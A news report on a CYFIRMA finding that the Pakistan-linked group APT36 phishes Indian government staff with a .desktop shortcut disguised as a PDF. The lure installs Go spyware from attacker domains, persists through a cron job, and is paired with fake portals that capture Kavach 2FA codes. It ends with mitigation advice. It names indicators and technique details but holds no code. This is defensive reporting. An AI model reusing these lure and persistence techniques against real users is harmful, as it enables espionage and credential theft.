Transparent Tribe (APT36), a hacker collective with ties to Pakistan, has once again come under fire for launching a new wave of cyberattacks against Indian government institutions.
A new cyber-espionage campaign targeting Indian government agencies has been discovered by researchers at cybersecurity firm CYFIRMA. In this campaign, attackers pose as harmless PDF documents to covertly install malware in the background using malicious desktop shortcut files.
How attack works
The campaign starts with phishing emails that look like official meeting invitations and include a file called “Meeting_Ltr_ID1543ops.pdf.desktop,” according to CYFIRMA. Clicking on the attached file, which looks like a harmless document, causes victims to unintentionally run a malicious shortcut file that installs spyware in the background rather than opening a PDF.
The file installs malware in the background after downloading it from servers under the control of the attacker, such as securestore[.]cv and modgovindia[.]space. A fake PDF hosted on Google Drive is opened in Firefox to evade suspicion, giving the victim the impression that they are just opening a meeting document.
The malware, which is written in the Go programming language, can enable long-term access, harvest login credentials, steal confidential information, and set up automated tasks to keep running even after a system reboot.
In a research blog post, CYFIRMA stated that “APT36’s ability to adapt its delivery mechanisms to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”
In contrast to previous campaigns, this one targets Linux-based systems in India, including Windows and BOSS (Bharat Operating System Solutions), a government-sponsored operating system.
The malware adds a cron job that executes the hidden payload “.config/systemd/systemd-update” each time the system reboots in order to remain persistent, making sure it continues to function even after shutdowns or process termination.
Given the widespread use of BOSS in government agencies, the hackers’ chances of success are increased by this dual-platform targeting.
How this matters
Experts in security caution that Transparent Tribe’s changing strategies have moved from its customary use of Windows malware to creating threats against Linux BOSS.
“A tactical shift toward utilizing local technologies is reflected in the use of.desktop payloads that target Linux BOSS. This demonstrates the group’s intention to diversify access vectors and guarantee persistence even in environments that have been hardened, in conjunction with conventional Windows-based malware and mobile implants, according to CYFIRMA.
The group is also operating credential-harvesting websites that imitate Indian government portals, which increases the risk. Phishing login pages deceive victims into divulging their password, email address, and even Kavach two-factor authentication (2FA) codes, which have been employed by Indian agencies since 2022 as a security measure. The attackers are able to access sensitive accounts completely by getting past this security layer.
long term danger
Targeting the Indian government, defense, and vital infrastructure institutions on a regular basis for more than ten years, Transparent Tribe is thought to be based in Pakistan. From basic Windows-based malware to highly customized Linux backdoors and credential theft schemes throughout South Asia, their strategies have gradually changed.
Recommendations & Mitigation
Government workers should exercise caution when handling email attachments and login pages, according to security researchers, since users are being tricked into divulging their credentials by disguised PDFs and phony portals.
In order to combat APT36’s campaign, which uses weaponized desktop files to target Indian government entities, agencies are advised to implement robust email security, regularly train users, and harden BOSS Linux with least-privilege controls. While timely patching and behavior-based controls are essential to thwart suspicious activity, endpoint detection, network monitoring, and the integration of IOCs/YARA rules will aid in early detection.
The bigger game
The event highlights the dangers to national security that APT groups pose when they target government infrastructure. If successful, such attacks could allow for long-term surveillance of Indian agencies, disrupt vital operations, and result in the theft of classified data. India’s efforts to protect sensitive infrastructure from cyber-espionage are becoming more difficult as Transparent Tribe keeps improving its techniques.
